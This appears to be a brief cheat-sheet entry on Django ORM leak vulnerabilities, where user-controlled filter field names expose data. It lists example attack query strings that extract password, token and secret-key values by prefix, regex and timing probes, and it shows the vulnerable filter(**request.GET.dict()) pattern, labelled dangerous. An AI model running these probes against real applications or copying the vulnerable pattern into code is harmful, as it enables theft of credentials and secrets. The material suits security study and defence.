Django ORM Leak refers to vulnerabilities where Django's ORM can be manipulated through query parameters to leak sensitive data, particularly through field lookups, JSON field access, or regex-based timing attacks.
# Django allows field lookups via double underscore
# If user controls lookup field:
User.objects.filter(**{user_input: value})
# Attacker can query related fields:
?filter=password__startswith=a
?filter=email__contains=admin
?filter=token__regex=^abc# With JSONField, attackers can extract nested data
?filter=profile__secret_key__startswith=sk_
# Or enumerate structure:
?filter=settings__has_key=api_key# Boolean-based data extraction via filter existence
GET /api/users?password__regex=^a # Returns results?
GET /api/users?password__regex=^b # Returns results?
# Timing-based extraction
GET /api/users?password__regex=^a.* # Time response
GET /api/users?password__regex=^b.* # Compare times# Dangerous: User controls filter field name
Model.objects.filter(**request.GET.dict())
# Also dangerous: String formatting in filters
Model.objects.filter(f"{field}__contains": value)